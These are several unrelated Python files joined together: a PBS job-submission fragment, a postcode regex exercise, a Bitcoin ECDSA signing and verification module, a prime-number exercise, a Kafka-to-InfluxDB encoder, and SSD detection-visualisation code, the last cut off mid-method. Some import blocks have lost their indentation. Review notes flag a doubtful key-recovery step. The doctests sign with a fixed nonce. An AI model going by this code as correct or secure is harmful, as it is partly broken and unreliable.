            if "=>> PBS: job killed: cput" in line:
                raise PBS_CputExceeded(line)
            elif 'Terminated' in line:
                raise PBS_Terminated(line)
        #check output of Dacapo
        f = open(TXTFILE,'r')
        for line in f:
            if 'abort_calc' in line:
                f.close()
                os.chdir(CWD)
                raise DacapoAborted, line
            # NOTE(review): this 'continue' is unreachable after the raise.
            continue
        f.close()
        #check last line for proper finish ('line' holds the last line read)
        if not ('clexit: exiting the program' in line
                or 'PAR: msexit halting Master' in line):
            os.chdir(CWD)
            print self.get_nc()
            raise DacapoNotFinished, line
        # something else must be wrong
        os.chdir(CWD)
        raise Exception,'something is wrong with your job!'
    #Past here, we need to submit a job.
    # tcsh job script: run the quasi-Newton relaxation, then strip the nc.
    job = '''\
#!/bin/tcsh
cd $PBS_O_WORKDIR
qn_relax -t %(qntags)s %(ncfile)s
stripnetcdf %(ncfile)s
#end
''' % {'qntags':string.join([str(t) for t in self.qnrelax_tags],','),
       'ncfile':NCFILE}
    f = open(JOBFILE,'w')
    f.write(job+'\n')
    f.close()
    # Make the job script executable (Python 2 octal literal).
    os.chmod(JOBFILE,0777)
    #now we know we have to submit our job
    cmd = 'qsub -j oe %s %s' % (self.qsuboptions,JOBFILE)
    status,output = commands.getstatusoutput(cmd)
    if status == 0:
        # Record the queue's job id so the next call can poll it.
        f = open(JOBIDFILE,'w')
        f.write(output)
        f.close()
        os.chdir(CWD)
        raise JobSubmitted, output
    else:
        print status, output
        os.chdir(CWD)
        raise Exception, 'Something is wrong with the qsub output'
    # (A large block of commented-out post-run checking code was removed
    # here; it duplicated the TXTFILE checks performed above.)
    return 0
|
# Exercise 6, string formatting and regular expressions
import re
import os

script_dir = os.path.dirname(__file__)
abs_file_path = os.path.join(script_dir, "postcodes.txt")

# Build a lookup of valid outward codes -> country.
# BUG FIX: the original reused the name 'valid' for both this list of file
# lines and the valid-postcode counter below, and never closed either file
# handle; 'with' blocks and a distinct name fix both.
validpc = dict()
valid_file_path = os.path.join(script_dir, 'validpc.txt')
with open(valid_file_path) as valid_file:
    for txt in valid_file.read().splitlines():
        kv = txt.split(",")
        validpc[kv[0]] = kv[1]

# Counters for valid and invalid codes (part b)
valid = 0
invalid = 0

with open(abs_file_path, 'r') as infile:
    for postcode in infile:
        # The variable 'postcode' contains the line read from the file.
        # Ignore empty lines
        if postcode.isspace():
            continue
        # (a): Remove newlines, tabs and spaces, and convert to uppercase
        postcode = re.sub(r"\s", "", postcode).upper()
        # (a): Insert a space before the final digit and 2 letters
        postcode = re.sub(r"(\d\w\w)$", r" \1", postcode)
        # Print the reformatted postcode
        print(postcode)
        # (b): Validate the postcode, returning a match object 'm'
        m = re.search(r"^[A-Z]{1,2}\d{1,2}[A-Z]? \d[A-Z]{2}$", postcode)
        if m:
            valid = valid + 1
            outward = postcode.split(' ')[0]
            if outward in validpc:
                country = validpc[outward]
                print(f"Postcode: {postcode} is from {country}")
            else:
                print(f"Postcode: {postcode} not found!")
        else:
            invalid = invalid + 1

# (b) Print the valid and invalid totals
print(f"Valid:{valid} Invalid:{invalid}")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import base64
from binascii import hexlify, unhexlify
try:
ModuleNotFoundError
except:
ModuleNotFoundError = ImportError
try:
from .ecmath import *
from .hexhashes import *
from .base58 import *
from .miscfuncs import *
from .miscbitcoinfuncs import *
from .bitcoin import *
from .rfc6979 import generate_k
except Exception as e:
if type(e) != ImportError and \
type(e) != ModuleNotFoundError and \
type(e) != ValueError and \
type(e) != SystemError:
raise Exception("Unknown problem with imports.")
from ecmath import *
from hexhashes import *
from base58 import *
from miscfuncs import *
from miscbitcoinfuncs import *
from bitcoin import *
from rfc6979 import generate_k
def sign(hash,priv,k=0):
    '''
    Returns a DER-encoded signature from a input of a hash and private
    key, and optionally a K value.

    Hash and private key inputs must be 64-char hex strings,
    k input is an int/long.

    >>> h = 'f7011e94125b5bba7f62eb25efe23339eb1637539206c87df3ee61b5ec6b023e'
    >>> p = 'c05694a7af0e01dceb63e5912a415c28d3fc823ca1fd3fa34d41afde03740466'
    >>> k = 4 # chosen by fair dice roll, guaranteed to be random
    >>> sign(h,p,k)
    '3045022100e493dbf1c10d80f3581e4904930b1404cc6c13900ee0758474fa94abe8c4cd130220598e37e2e66277ef4d0caf0e32d095debb3c744219508cd394b9747e548662b7'
    '''
    if k == 0:
        # Deterministic nonce per RFC 6979 when no k is supplied.
        k = generate_k(priv, hash)
    hash = int(hash,16)
    priv = int(priv,16)
    # r = x-coordinate of k*G, reduced mod the curve order.
    r = int(privtopub(dechex(k,32),True)[2:],16) % N
    s = ((hash + (r*priv)) * modinv(k,N)) % N
    # High S value is non-standard (soon to be invalid)
    # BUG FIX: N // 2, not N / 2 -- under Python 3, N / 2 is a float with
    # only 53 bits of precision, which can misclassify s values near N/2
    # for a 256-bit curve order.
    if s > (N // 2):
        s = N - s
    r, s = inttoDER(r), inttoDER(s)
    olen = dechex(len(r+s)//2,1)
    return '30' + olen + r + s
def verify(hash,sig,pub,exceptonhighS=False):
    '''
    Verify a DER-encoded signature against a given hash and public key

    No checking of format is done in this function, so the signature
    format (and other inputs) should be verified as being the correct
    format prior to using this method.

    Hash is just 64-char hex string
    Public key format can be verified with validatepubkey() which is
    found in .bitcoin
    Signature format can be validated with checksigformat() which is
    the next function after this

    'exceptonhighS' is available because many Bitcoin implementations
    will soon be invalidating high S values in signatures, in order
    to reduce transaction malleability issues. I decided an exception
    was preferable to returning False, so as to be distinct from a bad
    signature.

    >>> h = 'f7011e94125b5bba7f62eb25efe23339eb1637539206c87df3ee61b5ec6b023e'
    >>> sig = '3045022100e493dbf1c10d80f3581e4904930b1404cc6c13900ee0758474fa94abe8c4cd130220598e37e2e66277ef4d0caf0e32d095debb3c744219508cd394b9747e548662b7'
    >>> pub = '022587327dabe23ee608d8504d8bc3a341397db1c577370389f94ccd96bb59a077'
    >>> verify(h,sig,pub)
    True
    >>> sig = '3046022100e493dbf1c10d80f3581e4904930b1404cc6c13900ee0758474fa94abe8c4cd13022100a671c81d199d8810b2f350f1cd2f6a1fff7268a495f813682b18ea0e7bafde8a'
    >>> verify(h,sig,pub)
    True
    >>> verify(h,sig,uncompress(pub))
    True
    >>> verify(h,sig,pub,True)
    Traceback (most recent call last):
        ...
    TypeError: High S value.
    '''
    # Parse r and s straight out of the DER hex string.
    rlen = 2*int(sig[6:8],16)
    r = int(sig[8:8+(rlen)],16)
    s = int(sig[(12+rlen):],16) # Ignoring s-len; format dictates it
                                # will be to the end of string
    assert r < N
    if exceptonhighS:
        # BUG FIX: N // 2, not N / 2 -- N / 2 is an imprecise float under
        # Python 3 for a 256-bit N (see sign()).
        if s > (N // 2):
            raise TypeError("High S value.")
    # Standard ECDSA verification: recover R = u1*G + u2*Q and compare
    # its x-coordinate against r.
    w = modinv(s,N)
    x = int(addpubs(
        privtopub(dechex((int(hash,16) * w) % N,32),False),
        multiplypub(pub,dechex((r*w) % N,32),False),
        False)[2:66],16)
    return x==r
def checksigformat(a,invalidatehighS=False):
    '''
    Checks input to see if it's a correctly formatted DER Bitcoin
    signature in hex string format.

    Returns True/False. If it excepts, there's a different problem
    unrelated to the signature...

    This does NOT valid the signature in any way, it ONLY checks that
    it is formatted properly.

    If invalidatehighS is True, this function will return False on an
    otherwise valid signature format if it has a high S value.
    '''
    # Must be valid hex before anything else.
    try:
        a = hexstrlify(unhexlify(a))
    except:
        return False
    try:
        # Lengths of the r and s integer fields, in hex chars.
        rlen = 2*int(a[6:8],16)
        slen = 2*int(a[(10+rlen):(12+rlen)],16)
        r = a[8:8+(rlen)]
        s1 = a[(12+rlen):]
        s2 = a[(12+rlen):(12+rlen+slen)]
        # s must run exactly to the end of the string.
        assert s1 == s2
        s1 = int(s1,16)
        assert s1 < N
        # DER structure: 0x30 <total-len> 0x02 <r> 0x02 <s>.
        assert a[:2] == '30'
        assert len(a) == ((2*int(a[2:4],16)) + 4)
        assert a[4:6] == '02'
        assert a[(8+rlen):(10+rlen)] == '02'
        # DER integers are signed: a leading 00 is required iff the top
        # byte would otherwise read as negative (> 0x7f).
        if int(dechex(int(r,16))[:2],16) > 127:
            assert r[:2] == '00'
            assert r[2:4] != '00'
        else:
            assert r[:2] != '00'
        if int(dechex(s1)[:2],16) > 127:
            assert s2[:2] == '00'
            assert s2[2:4] != '00'
        else:
            assert s2[:2] != '00'
        assert len(r) < 67
        assert len(s2) < 67
    except AssertionError:
        return False
    except Exception as e:
        raise Exception(str(e))
    if invalidatehighS:
        # BUG FIX: N // 2, not N / 2 -- N / 2 is an imprecise float under
        # Python 3 for a 256-bit N (see sign()).
        if s1 > (N // 2):
            return False
    return True
def signmsg(msg,priv,iscompressed,k=0):
    '''
    Sign a message -- the message itself, not a hash -- with a given
    private key.

    Input private key must be hex, NOT WIF. Use wiftohex() found in
    .bitcoin in order to get the hex private key and whether it is
    (or rather, its public key is) compressed.

    'iscompressed' is True/False bool for whether or not to indicate
    compression on the public key that corresponds to the input
    private key hex.

    'iscompressed' is not defaulted to True like it is in most other
    functions, because it really matters whether you use it. All
    software implementations treat uncompressed and compressed keys as
    entirely different, and a valid message signature will NOT
    validate if the public key compression is not correct. Whereas for
    transaction signatures, only the r-value is checked, message
    signature validation additionally checks/verifies public key
    compression. So you must manually set it!

    Also, note that message signatures are an entirely different
    format from DER-encoded transaction signatures.

    Sample message, which includes the quotation marks, and has a new
    line and 4 spaces after the new line:
    "You miss 100% of the shots you don't take. -- Wayne Gretzky"
        -- Michael Scott

    >>> msg = '"You miss 100% of the shots you don\\'t take. -- Wayne Gretzky"\\n    -- Michael Scott'
    >>> p = 'c05694a7af0e01dceb63e5912a415c28d3fc823ca1fd3fa34d41afde03740466'
    >>> k = 4 # chosen by fair dice roll, guaranteed to be random
    >>> signmsg(msg,p,True,k)
    'H+ST2/HBDYDzWB5JBJMLFATMbBOQDuB1hHT6lKvoxM0TBxoLMWsgrFmA3CGam/poUZPl/PukXCrYBzuwMW3Tyyo='

    Your software should then translate that data set into something akin to:
    -----BEGIN BITCOIN SIGNED MESSAGE-----
    "You miss 100% of the shots you don't take. -- Wayne Gretzky"
        -- Michael Scott
    -----BEGIN BITCOIN SIGNATURE-----
    Address: 1AuZ7wby1rUVzwFvFgySeTFS7JcHN2TeGs

    H+ST2/HBDYDzWB5JBJMLFATMbBOQDuB1hHT6lKvoxM0TBxoLMWsgrFmA3CGam/poUZPl/PukXCrYBzuwMW3Tyyo=
    -----END BITCOIN SIGNATURE-----
    '''
    # Keep the untouched message for the verifymsg() round-trip below.
    omsg = msg
    # Stripping carraige returns is standard practice in every
    # implementation I found, including Bitcoin Core
    msg = msg.replace("\r\n","\n")
    # Bitcoin signed-message digest: hash256 of the magic prefix,
    # the varint message length, and the message bytes.
    msg1 = hexstrlify(bytearray("\x18Bitcoin Signed Message:\n",'utf-8'))
    msg2 = tovarint(len(msg))
    msg3 = hexstrlify(bytearray(msg,'utf-8'))
    msg = hash256(msg1 + msg2 + msg3)
    sig = sign(msg,priv,k)
    # Bitcoin message signature format doesn't use DER leading '00's
    # Although, r/s must be 64-char, so they are zfilled to that
    rlen = 2*int(sig[6:8],16)
    r = sig[8:8+(rlen)].lstrip("0").zfill(64)
    slen = 2*int(sig[10+(rlen):12+(rlen)],16)
    s = sig[12+(rlen):(12+(rlen)+(slen))].lstrip("0").zfill(64)
    pubkey = privtopub(priv,iscompressed)
    # Try each of the four recovery-id prefixes (27..30, +4 if the key is
    # compressed) until verifymsg() recovers the matching public key.
    for i in range(4):
        prefix = 27 + i
        if iscompressed:
            prefix = prefix + 4
        o = base64.b64encode(unhexlify(dechex(prefix,1) + r + s))
        if str(o)[:2] == "b'": # strip the b'...' repr wrapper on Python 3
            o = str(o)[2:-1]
        if verifymsg(omsg,o) == pubkey:
            return o
    raise Exception("Unknown failure. This method should never reach the end.")
def verifymsg(msg,sig):
    '''
    Compares the message and input signature, and outputs what the
    corresponding public key is that would make that message/signature
    pair valid.
    I didn't set it to take in a pubkey and output True/False because
    sometimes it is useful to have the resulting key, even if the
    msg/sig pair is invalid.
    (And not just in the signmsg() function above.)
    Also, worth remembering that message signatures are an entirely
    different format than DER-encoded transaction signatures.
    >>> msg = '"You miss 100% of the shots you don\\'t take. -- Wayne Gretzky"\\n -- Michael Scott'
    >>> sig = 'H+ST2/HBDYDzWB5JBJMLFATMbBOQDuB1hHT6lKvoxM0TBxoLMWsgrFmA3CGam/poUZPl/PukXCrYBzuwMW3Tyyo='
    >>> x = verifymsg(msg,sig)
    >>> pub = '022587327dabe23ee608d8504d8bc3a341397db1c577370389f94ccd96bb59a077'
    >>> x == pub
    True
    '''
    msg = msg.replace("\r\n","\n")
    # Again, standard convention to remove returns
    # Hash the standard signed-message envelope:
    # 0x18 "Bitcoin Signed Message:\n" + varint(len(msg)) + msg, double-SHA256'd.
    msg1 = hexstrlify(bytearray("\x18Bitcoin Signed Message:\n",'utf-8'))
    msg2 = tovarint(len(msg))
    msg3 = hexstrlify(bytearray(msg,'utf-8'))
    msg = hash256(msg1 + msg2 + msg3)
    # A message signature decodes to 65 bytes (130 hex chars):
    # 1 prefix byte, then r and s as 32 bytes each.
    sig = hexstrlify(base64.b64decode(sig))
    r = int(sig[2:66],16)
    s = int(sig[66:],16)
    prefix = int(sig[:2],16)
    # Prefix 27-30 means the recovered key is uncompressed; 31-34 compressed.
    # After the subtraction, prefix holds the recovery id (0-3).
    if prefix > 30:
        out_compressed = True
        prefix = prefix - 4
    else:
        out_compressed = False
        prefix = prefix - 27
    # Derive the x-coordinate of the candidate point R from r.
    # NOTE(review): standard recovery uses x = r + (recid // 2) * N *without*
    # reducing mod N; the "% N" below collapses recids 2/3 back onto r --
    # confirm this is intended (it only matters when r + N < P).
    m = int(N*prefix) if prefix > 1 else 0
    x = (r + int(m//2)) % N
    # Solve y^2 = x^3 + 7 (mod P). Since P % 4 == 3, a square root of 'a'
    # is a^((P+1)/4) mod P.
    a = (pow_mod(x, 3, P) + 7) % P
    b = pow_mod(a, ((P+1)//4), P)
    # Choose the root whose parity matches the recovery id.
    # NOTE(review): this compares b % 2 (0 or 1) against the full recovery
    # id (0-3) rather than prefix % 2, so for recids 2/3 the root is always
    # negated -- verify against a known recid-2/3 test vector.
    if (b % 2) != prefix:
        y = (-b % P)
    else:
        y = b
    x, y = dechex(x,32), dechex(y,32)
    pubkey = "04" + x + y
    # Recover Q = r^-1 * (s*R - e*G) using this module's point arithmetic
    # (e is the message hash; the subtraction is done by adding -e mod N).
    negative_msg = dechex((N - int(msg,16)),32)
    modinv_r = dechex(modinv(r, N),32)
    pubkey = multiplypub(
             addpubs(
             multiplypub(pubkey,dechex(s,32),False),
             privtopub(negative_msg,False),False),
             modinv_r,False)
    if out_compressed:
        pubkey = compress(pubkey)
    return strlify(pubkey)
def checkmsgsigformat(sig, invalidatehighS=False):
    """Check that a base64 message signature is structurally valid.

    A valid Bitcoin message signature decodes to exactly 65 bytes
    (130 hex chars): one recovery-prefix byte in the range 27-34
    inclusive, followed by r and s as 32 bytes each.

    :param sig: base64-encoded message signature
    :param invalidatehighS: when True, additionally reject non-canonical
        "high-S" signatures whose s value exceeds N // 2
    :returns: True when the format checks pass, False otherwise
    :raises Exception: wraps unexpected errors (e.g. invalid base64)
    """
    try:
        sig = hexstrlify(base64.b64decode(sig))
        # Plain 'if' checks instead of asserts: asserts are stripped under
        # 'python -O', which would silently disable this validation.
        if len(sig) != 130:
            return False
        prefix = int(sig[:2], 16)
        if prefix < 27 or prefix > 34:
            return False
        if invalidatehighS:
            # Use integer division: N is ~2**256, so the float result of
            # N / 2 is inexact and can misclassify values near the boundary.
            if int(sig[-64:], 16) > (N // 2):
                return False
    except Exception as e:
        raise Exception(str(e))
    return True
|
# Esercizio n. 9
# Find the prime numbers in a list of numbers from 1 up to 20.
lista = [8, 1, 3, 5, 4, 9, 20, 12, 15, 11, 2, 19, 10, 13]


def is_primo(n):
    """Return True if n is a prime number.

    Fixes the original logic, which reported 1 as prime (the trial-division
    loop never ran for n <= 2, leaving the flag True). Also stops dividing
    at the first factor and only tests divisors up to sqrt(n).
    """
    if n < 2:  # 0 and 1 are not prime by definition
        return False
    i = 2
    while i * i <= n:  # a composite n must have a factor <= sqrt(n)
        if n % i == 0:
            return False  # found a divisor: not prime
        i = i + 1
    return True


for num in lista:
    if is_primo(num):
        print("Il numero", num, "è primo")
|
"""Encoder for snap-plugin-publisher-kafka."""
try:
import ujson as json
except ImportError:
import json
import logging
import datetime
import time
try:
    # Test for mypy support (requires Python 3 / the typing module)
    from typing import List, Text
except ImportError:
    # Narrowed from a bare 'except': only a missing module is expected
    # here, and a bare except would also swallow KeyboardInterrupt.
    pass
class Encoder(object):
    """Encoder for the snap-plugin-publisher-kafka JSON format.

    Converts the JSON documents published by
    https://github.com/intelsdi-x/snap-plugin-publisher-kafka into
    InfluxDB line-protocol style strings: "measurement,tags value time".

    Sample measurement (abridged):
    {
        "timestamp":"2017-09-19T14:56:07.863770559Z",
        "namespace":"/intel/docker/225c1a3e9f65/stats/filesystem/xvda1/writes_merged",
        "data":1.4012927170541047,
        "dataRate":null,
        "unit":"",
        "tags":{ "...": "..." },
        "version":8,
        "last_advertised_time":"2017-09-19T14:56:08.863770559Z"
    }
    """

    def encode(self, msg):
        # type: (bytes) -> List[Text]
        """Decode *msg* and return one line-protocol string per measurement.

        Each line of *msg* is expected to be a JSON document that iterates
        to measurement dicts (presumably a JSON array of measurements --
        verify against the actual publisher output). Unparseable lines and
        malformed entries are logged at debug level and skipped.

        Note: the Python 2 'print ent' / 'print e' debug statements were
        removed -- they were SyntaxErrors on Python 3 and duplicated the
        logging.debug output.
        """
        measurements = []
        for line in msg.decode().split("\n"):
            try:
                # Set flag for float precision to get the same
                # results for Python 2 and 3.
                json_object = self.parse_line(line)
            except ValueError as e:
                logging.debug("Error in encoder: %s", e)
                continue
            try:
                # To use plugin/plugin_instance as the measurement name,
                # pass ['plugin', 'plugin_instance'] instead of ['namespace'].
                for ent in json_object:
                    measurement = Encoder.format_measurement_name(ent, ['namespace'])
                    tags = Encoder.format_tags(ent, ['tags'])
                    value = Encoder.format_value(ent)
                    # Renamed from 'time' so the 'time' module isn't shadowed.
                    timestamp = Encoder.format_time(ent)
                    measurements.append(Encoder.compose_data(measurement, tags, value, timestamp))
            except Exception as e:
                logging.debug("Error in input data: %s. Skipping.", e)
                continue
        return measurements

    @staticmethod
    def parse_line(line):
        """Parse a single JSON line; raises ValueError on malformed input."""
        # json.loads(line, {'precise_float': True}) was used previously;
        # for influxdb versions > 0.9 the timestamp is an integer.
        return json.loads(line)

    # The following methods make measurement names and tags customizable.

    @staticmethod
    def compose_data(measurement, tags, value, time):
        """Assemble the final 'measurement,tags value time' string."""
        data = "{0!s},{1!s} {2!s} {3!s}".format(measurement, tags, value, time)
        return data

    @staticmethod
    def format_measurement_name(entry, args):
        """Join the values of the *args* keys found in *entry* with '_'."""
        name = []
        for arg in args:
            if arg in entry:
                # Skip empty values to avoid adding a stray '_' separator.
                if entry[arg] != '':
                    name.append(entry[arg])
        return '_'.join(name)

    @staticmethod
    def format_tags(entry, args):
        """Render the *args* keys of *entry* as comma-joined 'key=value' pairs."""
        tag = []
        for arg in args:
            if arg in entry:
                # Skip empty values so '' never becomes a tag value.
                if entry[arg] != '':
                    tag.append("{0!s}={1!s}".format(arg, entry[arg]))
        return ','.join(tag)

    @staticmethod
    def format_time(entry):
        """Convert the entry's ISO-8601 timestamp to a Unix epoch float.

        NOTE(review): the trailing 'Z' plus three digits of sub-microsecond
        precision are sliced off, and time.mktime interprets the parsed
        value as *local* time even though the source is UTC -- confirm this
        offset is acceptable downstream.
        """
        d = datetime.datetime.strptime(entry['timestamp'][:-4], "%Y-%m-%dT%H:%M:%S.%f")
        return time.mktime(d.timetuple())

    @staticmethod
    def format_value(entry):
        """Render the entry's 'data' field as 'value=<data>'."""
        values = entry['data']
        return "value={0!s}".format(str(values))
|
"""
第2章SSDで予測結果を画像として描画するクラス
"""
import numpy as np
import matplotlib.pyplot as plt
import cv2 # OpenCVライブラリ
import torch
import time
from utils.dataset import DatasetTransform as DataTransform
import torch.nn as nn
class SSDPredictShow(nn.Module):
    """Run SSD inference on images and visualize the predicted boxes.

    Wraps an SSD network together with its preprocessing transform and a
    matplotlib-based renderer. Changes from the original: stray debug
    prints removed, the bare 'except' narrowed, and the loop-invariant
    net.eval().to(device) hoisted out of the dataloader loop.
    """

    def __init__(self, eval_categories, net, device, TTA=True, image_size=300):
        """
        Parameters
        ----------
        eval_categories: list
            Class names (background excluded).
        net: nn.Module
            The SSD network.
        device: torch.device
            Device to run inference on.
        TTA: bool
            Test-time-augmentation flag (stored; not used by this class).
        image_size: int
            Side length of the square network input.
        """
        super(SSDPredictShow, self).__init__()  # run the parent constructor
        print(device)
        self.eval_categories = eval_categories  # class names
        self.net = net.to(device).eval()  # SSD network, set to inference mode
        self.device = device
        self.TTA = TTA
        color_mean = (104, 117, 123)  # mean (B, G, R) values for normalization
        input_size = image_size  # resize inputs to input_size x input_size
        self.transform = DataTransform(input_size, color_mean)  # preprocessing

    def show(self, image_file_path, data_confidence_level):
        """
        Detect objects in an image file and display the result.

        Parameters
        ----------
        image_file_path: str
            Path to the image file.
        data_confidence_level: float
            Confidence threshold for keeping a prediction.

        Returns
        -------
        None. The RGB image is shown with the detections drawn on it.
        """
        rgb_img, predict_bbox, pre_dict_label_index, scores = self.ssd_predict(
            image_file_path, data_confidence_level)
        self.vis_bbox(rgb_img, bbox=predict_bbox, label_index=pre_dict_label_index,
                      scores=scores, label_names=self.eval_categories)

    def ssd_predict(self, image_file_path, data_confidence_level=0.5):
        """
        Run SSD prediction on a single image file.

        Parameters
        ----------
        image_file_path: str
            Path to the image file.
        data_confidence_level: float
            Confidence threshold for keeping a prediction.

        Returns
        -------
        rgb_img, predict_bbox, pre_dict_label_index, scores
        """
        # Load the image; OpenCV returns [height][width][BGR].
        img = cv2.imread(image_file_path)
        height, width, channels = img.shape  # original image size
        rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)

        # Preprocess. There are no annotations, so pass "" for boxes/labels.
        phase = "val"
        img_transformed, boxes, labels = self.transform(
            img, phase, "", "")
        img = torch.from_numpy(
            img_transformed[:, :, (2, 1, 0)]).permute(2, 0, 1).to(self.device)

        # Forward pass (debug print of the tensor size removed).
        x = img.unsqueeze(0)  # add batch dim: torch.Size([1, 3, H, W])
        detections = self.net(x)
        # detections has shape [1, n_classes, top_k, 5]; top_k is e.g. 200.

        # Keep only predictions whose confidence meets the threshold.
        predict_bbox = []
        pre_dict_label_index = []
        scores = []
        detections = detections.cpu().detach().numpy()
        find_index = np.where(detections[:, 0:, :, 0] >= data_confidence_level)
        detections = detections[find_index]
        for i in range(len(find_index[1])):  # loop over the kept predictions
            if (find_index[1][i]) > 0:  # skip the background class (index 0)
                sc = detections[i][0]  # confidence
                bbox = detections[i][1:] * [width, height, width, height]
                # find_index is a (batch, class, top_k) index tuple;
                # subtract 1 because class index 0 is the background.
                lable_ind = find_index[1][i] - 1
                predict_bbox.append(bbox)
                pre_dict_label_index.append(lable_ind)
                scores.append(sc)
        return rgb_img, predict_bbox, pre_dict_label_index, scores

    def ssd_predict2(self, image_file_path, data_confidence_level=0.5):
        """
        Like ssd_predict, but runs under torch.no_grad() and returns the
        raw (in-place scaled) detection rows instead of a bbox list.

        Parameters
        ----------
        image_file_path: str
            Path to the image file.
        data_confidence_level: float
            Confidence threshold for keeping a prediction.

        Returns
        -------
        detections, pre_dict_label_index
        """
        img = cv2.imread(image_file_path)  # [height][width][BGR]
        height, width, channels = img.shape  # original image size

        # Preprocess. There are no annotations, so pass "" for boxes/labels.
        phase = "val"
        img_transformed, boxes, labels = self.transform(
            img, phase, "", "")
        img = torch.from_numpy(
            img_transformed[:, :, (2, 1, 0)]).permute(2, 0, 1).to(self.device)

        x = img.unsqueeze(0)  # add batch dim: torch.Size([1, 3, 300, 300])
        with torch.no_grad():
            detections = self.net(x)
        # detections has shape [1, n_classes, top_k, 5].

        pre_dict_label_index = []
        scores = []
        try:
            detections = detections.cpu().detach().numpy()
        except Exception:
            # Narrowed from a bare 'except'; fallback for outputs on
            # which .cpu() is unavailable.
            detections = detections.detach().numpy()

        # Keep only predictions whose confidence meets the threshold.
        find_index = np.where(detections[:, 0:, :, 0] >= data_confidence_level)
        detections = detections[find_index]
        for i in range(len(find_index[1])):  # loop over the kept predictions
            if (find_index[1][i]) > 0:  # skip the background class (index 0)
                sc = detections[i][0]  # confidence
                detections[i][1:] *= [width, height, width, height]  # scale in place
                # Subtract 1 because class index 0 is the background.
                lable_ind = find_index[1][i] - 1
                pre_dict_label_index.append(lable_ind)
                scores.append(sc)
        return detections, pre_dict_label_index

    def ssd_inference(self, dataloader, all_boxes, data_confidence_level=0.05):
        """
        Run SSD over a dataloader and fill *all_boxes* for evaluation.

        Parameters
        ----------
        dataloader: iterable
            Yields (images, targets) batches.
        all_boxes: list
            Indexed as all_boxes[class][image]; receives a list of
            [score, x1, y1, x2, y2] rows or an empty array per image.
        data_confidence_level: float
            Confidence threshold for keeping a prediction.

        Returns
        -------
        The filled-in all_boxes structure.
        """
        empty_array = np.transpose(np.array([[], [], [], [], []]), (1, 0))
        iii = 0  # running batch counter
        # The transform resizes every image to 300x300, so boxes are
        # rescaled by a single constant.
        width = 300
        height = 300
        # Inference mode; hoisted out of the loop (it is loop-invariant).
        self.net.eval().to(self.device)
        for img, _ in dataloader:
            num_batch = len(img)
            tick = time.time()
            with torch.no_grad():
                x = img.to(self.device)  # mini-batch: torch.Size([N, 3, 300, 300])
                detections = self.net(x)
            tock = time.time()
            # detections has shape [N, 21, top_k, 5]; top_k is e.g. 200.
            predict_bbox = []
            pre_dict_label_index = []
            scores = []
            detections = detections.cpu().detach().numpy()
            took = time.time()
            # Keep predictions above the threshold, per image and class.
            for batch, detection in enumerate(detections):
                for cls in range(21):
                    box = []
                    for j, pred in enumerate(detection[cls]):
                        if pred[0] > data_confidence_level:
                            pred[1:] *= width  # scale normalized coords to pixels
                            box.append([pred[0], pred[1], pred[2], pred[3], pred[4]])
                    if not box == []:
                        all_boxes[cls][iii * num_batch + batch] = box
                    else:
                        all_boxes[cls][iii * num_batch + batch] = empty_array
            teek = time.time()
            print("iter:", iii)
            iii += 1
            print("sort boxes. detection was {} and post took {} and allboxappend took {}".format(tock - tick, took - tock, teek - took))
        return all_boxes

    def vis_bbox(self, rgb_img, bbox, label_index, scores, label_names):
        """
        Draw the detection results on the image.

        Parameters
        ----------
        rgb_img: ndarray
            The RGB image to draw on.
        bbox: list
            Bounding boxes, each as [x1, y1, x2, y2] in pixels.
        label_index: list
            Index into label_names for each box.
        scores: list or None
            Confidence per box; None renders boxes as ground-truth answers.
        label_names: list
            Class names (background excluded).

        Returns
        -------
        None. The image is shown with boxes and labels drawn on it.
        """
        # One distinct frame color per class.
        num_classes = len(label_names)
        colors = plt.cm.hsv(np.linspace(0, 1, num_classes)).tolist()

        # Show the image.
        plt.figure(figsize=(10, 10))
        plt.imshow(rgb_img)
        currentAxis = plt.gca()

        # Loop over the boxes.
        for i, bb in enumerate(bbox):
            label_name = label_names[label_index[i]]
            color = colors[label_index[i]]  # per-class frame color

            # Box label, e.g. "person: 0.72".
            if scores is not None:
                sc = scores[i]
                display_txt = '%s: %.2f' % (label_name, sc)
            else:
                display_txt = '%s: ans' % (label_name)

            # Rectangle geometry.
            xy = (bb[0], bb[1])
            width = bb[2] - bb[0]
            height = bb[3] - bb[1]

            # Draw the rectangle and its label at the top-left corner.
            currentAxis.add_patch(plt.Rectangle(
                xy, width, height, fill=False, edgecolor=color, linewidth=2))
            currentAxis.text(xy[0], xy[1], display_txt, bbox={
                'facecolor': color, 'alpha': 0.5})
from utils.ssd import Detect_Flip
class SSDPredictShowFlip(nn.Module):
    """Run SSD prediction with horizontal-flip test-time augmentation and
    display the results on the image."""
    def __init__(self, eval_categories, net, device, TTA=True, softnms=False):
        super(SSDPredictShowFlip, self).__init__()  # run the parent constructor
        print(device)
        self.eval_categories = eval_categories  # class names
        self.net = net.to(device)  # the SSD network
        self.device = device
        self.TTA =TTA
        color_mean = (104, 117, 123)  # mean (B, G, R) values for normalization
        input_size = 300  # resize input images to 300x300
        self.transform = DataTransform(input_size, color_mean)  # preprocessing
        # Detector that merges original + flipped predictions.
        self.Det = Detect_Flip(TTA=TTA, softnms=softnms).to(self.device).eval()
    def show(self, image_file_path, data_confidence_level):
        """
        Detect objects in an image file and display the result.
        Parameters
        ----------
        image_file_path: str
            Path to the image file.
        data_confidence_level: float
            Confidence threshold for keeping a prediction.
        Returns
        -------
        None. The RGB image is shown with the detections drawn on it.
        """
        rgb_img, predict_bbox, pre_dict_label_index, scores = self.ssd_predict(
            image_file_path, data_confidence_level)
        self.vis_bbox(rgb_img, bbox=predict_bbox, label_index=pre_dict_label_index,
                      scores=scores, label_names=self.eval_categories)
    def ssd_predict(self, image_file_path, data_confidence_level=0.5):
        """
        Run SSD prediction on the original and horizontally flipped image,
        then merge the two detection sets.
        Parameters
        ----------
        image_file_path: str
            Path to the image file.
        dataconfidence_level: float
            Confidence threshold for keeping a prediction.
        Returns
        -------
        rgb_img, predict_bbox, pre_dict_label_index, scores
        """
        # Load the image; OpenCV returns [height][width][BGR].
        img = cv2.imread(image_file_path)
        height, width, channels = img.shape  # original image size
        rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        # Preprocess. There are no annotations, so pass "" for boxes/labels.
        phase = "val"
        img_transformed, boxes, labels = self.transform(
            img, phase, "", "")
        #print("img shape:", img_transformed.shape)
        img = torch.from_numpy(
            img_transformed[:, :, (2, 1, 0)]).permute(2, 0, 1).to(self.device)
